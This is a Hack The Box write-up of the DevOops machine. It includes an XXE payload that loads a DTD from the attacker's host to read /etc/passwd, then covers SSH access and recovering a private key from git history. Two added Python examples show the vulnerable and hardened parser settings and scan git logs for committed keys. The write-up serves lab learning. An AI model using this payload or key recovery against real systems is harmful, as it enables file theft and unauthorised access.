Introduction
DevOops is a machine on Hack The Box.
Hack The Box is an online platform that lets you test your penetration testing skills and exchange ideas and methodologies with other members with similar interests. It contains several challenges that are constantly updated.
This article will show how to hack the DevOops box and get user.txt and root.txt.
Collection
First, we use Nmap to scan the box and see which ports are open.
Let's open a browser and visit http://10.10.10.91:5000/ .
OK, it looks like a website. Let's enumerate it.
After enumeration, we found a page where we can upload an XML file.
Hack the DevOops Box
Get User.txt
I think it has an XXE issue. But let's submit a simple XML file first.
<note>
  <Author>Tom</Author>
  <Subject>Computer</Subject>
  <Content>HowToBuyAMacComputer</Content>
</note>
After submitting this file, the website returns a message.
Now, let’s submit our payload.
First, we create a new XML file:
<?xml version="1.0" ?>
<!DOCTYPE convert [
  <!ENTITY % remote SYSTEM "http://10.10.14.2/1.dtd">
  %remote;
  %int;
  %trick;
]>
<note>
  <Author>&b;</Author>
  <Subject>Jani</Subject>
  <Content>Reminder</Content>
</note>
Then, we create a DTD file on our Kali Linux machine with the following content:
<!ENTITY b SYSTEM "file:///etc/passwd">
Then, we start a simple HTTP server using Python to host the DTD file.
Finally, the payload reads the /etc/passwd file.
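To show, on the parser side, what this payload relies on, here is an added example (not code from the write-up and not the DevOops application's own parser, which is not available here): a small Python xml.sax-based "note" parser with the vulnerable setting and the hardened setting side by side. The secret file, the XML document and the helper names (NoteHandler, parse_note, demo) are constructed for this demonstration; a local temp file stands in for /etc/passwd.

```python
# Added example, not code from the original write-up: a minimal version of the
# "note" parser with and without external general entity resolution, to show
# what the XXE payload above exploits and what the hardened setting changes.
# The secret file and the XML are constructed here for the demonstration.
import io
import pathlib
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class NoteHandler(ContentHandler):
    """Collects the text of each child element of <note> into a dict."""

    def __init__(self):
        super().__init__()
        self.fields = {}
        self._current = None

    def startElement(self, name, attrs):
        if name != "note":
            self._current = name
            self.fields.setdefault(name, "")

    def characters(self, content):
        if self._current is not None:
            self.fields[self._current] += content

    def endElement(self, name):
        self._current = None


def parse_note(xml_bytes, allow_external_entities=False):
    """Parse a <note> document and return {element name: text}.

    allow_external_entities=True reproduces the vulnerable configuration: the
    parser fetches SYSTEM entities (file://, http://) and splices their content
    into the document, which is what the DevOops upload form did. The default
    (False) is the hardened setting; xml.sax has defaulted to it since 3.7.1.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, allow_external_entities)
    note = NoteHandler()
    parser.setContentHandler(note)
    parser.parse(io.BytesIO(xml_bytes))
    return note.fields


def demo():
    """Run the same XXE document through both configurations.

    Returns (vulnerable_fields, hardened_fields). A local temp file stands in
    for /etc/passwd so the example runs anywhere without touching system files.
    """
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as tmp:
        tmp.write("SECRET-CONSTRUCTED")
        secret_path = pathlib.Path(tmp.name)
    # Same shape as the write-up's payload, with the external entity declared
    # directly in the internal subset instead of being pulled in via a remote DTD.
    xxe = f"""<?xml version="1.0" ?>
<!DOCTYPE note [ <!ENTITY b SYSTEM "{secret_path.as_uri()}"> ]>
<note>
  <Author>&b;</Author>
  <Subject>Computer</Subject>
  <Content>Reminder</Content>
</note>""".encode()
    try:
        vulnerable = parse_note(xxe, allow_external_entities=True)
        hardened = parse_note(xxe)  # default: external entities are not resolved
    finally:
        secret_path.unlink()
    return vulnerable, hardened


if __name__ == "__main__":
    v, h = demo()
    print("vulnerable parser, Author:", repr(v["Author"]))
    print("hardened parser,   Author:", repr(h["Author"]))
```

The only difference between the two calls is the feature_external_ges flag: with it on, the file contents land in the Author field exactly as the write-up's screenshot shows for /etc/passwd; with it off (the default in current Python), the entity reference resolves to nothing and the other fields are unaffected. For lxml the equivalent knob is XMLParser(resolve_entities=False), and the defusedxml package wraps the standard-library parsers with these settings forced off.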
Since SSH is open, I think I can find an SSH key in the default folder.
Then, we get user.txt.
Get Root.txt
We found that there is a “git” user, so we try to log in as git.
Then, we check the .bash_history file.
We found that the git user initialized a git repo. Let's go to that folder and see what we can find.
We check the git log.
We found that this user added a key. Let's check this commit.
Then, we use this key to log in.
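The lesson of this step is that a key committed once stays in the repository history even after the file is deleted. As an added example (not code from the write-up, and not the actual DevOops repository or commit ids, which are not reproduced here), the following Python scanner reads the text of "git log -p" and reports every commit that added private key material. The log it runs on is constructed, with placeholder commit ids and a fake key body.

```python
# Added example, not code from the original write-up: a scanner for
# "git log -p" output that reports every commit that ADDED private key
# material, so that a key deleted in a later commit is still found. The log
# below is constructed for the demonstration (commit ids are placeholders).
import re

# PEM header of any private key type: RSA, EC, OPENSSH, plain "PRIVATE KEY", ...
PRIVATE_KEY_HEADER = re.compile(r"-----BEGIN ((?:[A-Z]+ )*PRIVATE KEY)-----")

# Constructed sample: the newest commit deletes id_rsa, the older one added it.
SAMPLE_GIT_LOG = """\
commit 2222222222222222222222222222222222222222
Author: git <git@devoops.example>
Date:   Sat Mar 24 00:00:00 2018 +0000

    remove key

diff --git a/id_rsa b/id_rsa
deleted file mode 100644
--- a/id_rsa
+++ /dev/null
@@ -1,3 +0,0 @@
------BEGIN RSA PRIVATE KEY-----
-CONSTRUCTED-NOT-A-REAL-KEY
------END RSA PRIVATE KEY-----
commit 1111111111111111111111111111111111111111
Author: git <git@devoops.example>
Date:   Fri Mar 23 00:00:00 2018 +0000

    add key

diff --git a/id_rsa b/id_rsa
new file mode 100644
--- /dev/null
+++ b/id_rsa
@@ -0,0 +1,3 @@
+-----BEGIN RSA PRIVATE KEY-----
+CONSTRUCTED-NOT-A-REAL-KEY
+-----END RSA PRIVATE KEY-----
"""


def find_added_private_keys(log_text):
    """Return [(commit, path, key_type)] for each added line with a PEM header.

    Only '+' lines inside hunks are inspected, so the deletion in a later
    commit ('-' lines) neither hides nor duplicates the original finding.
    """
    findings = []
    commit = path = None
    in_hunk = False
    for line in log_text.splitlines():
        if line.startswith("commit "):
            commit = line.split()[1]  # tolerates "commit <id> (HEAD -> master)"
            path = None
            in_hunk = False
        elif line.startswith("diff --git "):
            in_hunk = False
        elif not in_hunk and line.startswith("+++ "):
            target = line[4:]
            path = None if target == "/dev/null" else target.removeprefix("b/")
        elif line.startswith("@@"):
            in_hunk = True
        elif in_hunk and line.startswith("+"):
            match = PRIVATE_KEY_HEADER.search(line[1:])
            if match:
                findings.append((commit, path, match.group(1)))
    return findings


if __name__ == "__main__":
    for commit, path, key_type in find_added_private_keys(SAMPLE_GIT_LOG):
        print(f"{commit[:12]}  {path}  {key_type}")
```

Running it on real output (git log -p --all, piped in) lists the commits to inspect; if anything is found, the fix is to treat that key as compromised and rotate it, because rewriting history does not help once a clone exists.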
Summary
This box is not difficult; the difficulty should be around 3. There are two challenges. First, creating the XML payload. Second, finding that there is a git user account that can log in. Once you find that git can log in, you will realise that there must be some information in the git log.
If you want to read more Hack The Box writeups, you can visit this link.